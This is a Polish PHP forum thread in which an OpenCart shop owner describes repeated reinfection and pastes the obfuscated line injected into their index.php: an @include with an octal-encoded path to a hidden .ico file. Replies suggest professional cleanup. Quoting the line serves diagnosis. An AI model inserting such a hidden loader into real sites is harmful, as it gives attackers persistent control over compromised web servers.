Witaj Gościu! ( Zaloguj | Rejestruj )

Forum PHP.pl

 
Reply to this topicStart new topic
> wirusy na sklepie
Kryszic
post 15.10.2019, 12:28:18
Post #1





Grupa: Zarejestrowani
Postów: 120
Pomógł: 0
Dołączył: 17.10.2006

Ostrzeżenie: (0%)
-----


cześć

nie wiem czy w dobry dział wszedłem ale mam następujący problem i jestem bezsilny

mam sklep na opencart wersja 3.0

i od jakiegoś czasu walczę z wirusami albo nadpisuję mi się plik index.php albo dodają się pliki do folderu public_html
zmiana hasła do serwera nie pomaga kod mam cały przeanalizowany wygląda na to, że jest czysty

mój komputer też jest czysty, mam jeszcze inne serwery i tam jest wszystko ok.

Akcja z dzisiaj: nadpisanie pliku index.php następującym kodem:

/*dbd7a*/

@include "\057ho\155e/\155ax\164er\0703/\144om\141in\163/m\141xt\145r.\160l/\160ub\154ic\137ht\155l/\143at\141lo\147/c\157nt\162ol\154er\057st\141rt\165p/\056db\1462f\06654\056ic\157";

/*dbd7a*/

dodatkowo na serwerze mam uruchomiony open base dir


Go to the top of the page
+Quote Post
kapslokk
post 15.10.2019, 12:41:34
Post #2





Grupa: Zarejestrowani
Postów: 965
Pomógł: 285
Dołączył: 19.06.2015
Skąd: Warszawa

Ostrzeżenie: (0%)
-----


Cytat(Kryszic @ 15.10.2019, 13:28:18 ) *
kod mam cały przeanalizowany wygląda na to, że jest czysty


smile.gif A kto go analizował?
Go to the top of the page
+Quote Post
Kryszic
post 15.10.2019, 12:48:13
Post #3





Grupa: Zarejestrowani
Postów: 120
Pomógł: 0
Dołączył: 17.10.2006

Ostrzeżenie: (0%)
-----


programista

znaczy pewności nie mamy w 100%

ale czy tego typu działania (nadpisywanie plików) są związane ze szkodliwym kodem który mamy gdzieś na sklepie ?
Go to the top of the page
+Quote Post
dublinka
post 16.10.2019, 06:58:06
Post #4





Grupa: Zarejestrowani
Postów: 594
Pomógł: 66
Dołączył: 22.02.2008
Skąd: Dublin

Ostrzeżenie: (0%)
-----


Ameryki pewnie nie odkryje pisząc żebyś skontaktował się z jakąś firma od usuwania wszelkiego złośliwego kodu i która może wdrożyć jakieś zabezpieczenia. Przydaloby się napisać do twórców tegpo skryptu czy mieli podobne zgloszeni a bo być może jest gdzieś dziura


--------------------
Go to the top of the page
+Quote Post

Reply to this topicStart new topic
1 Użytkowników czyta ten temat (1 Gości i 0 Anonimowych użytkowników)
0 Zarejestrowanych:

 



RSS Wersja Lo-Fi Aktualny czas: 28.03.2024 - 21:30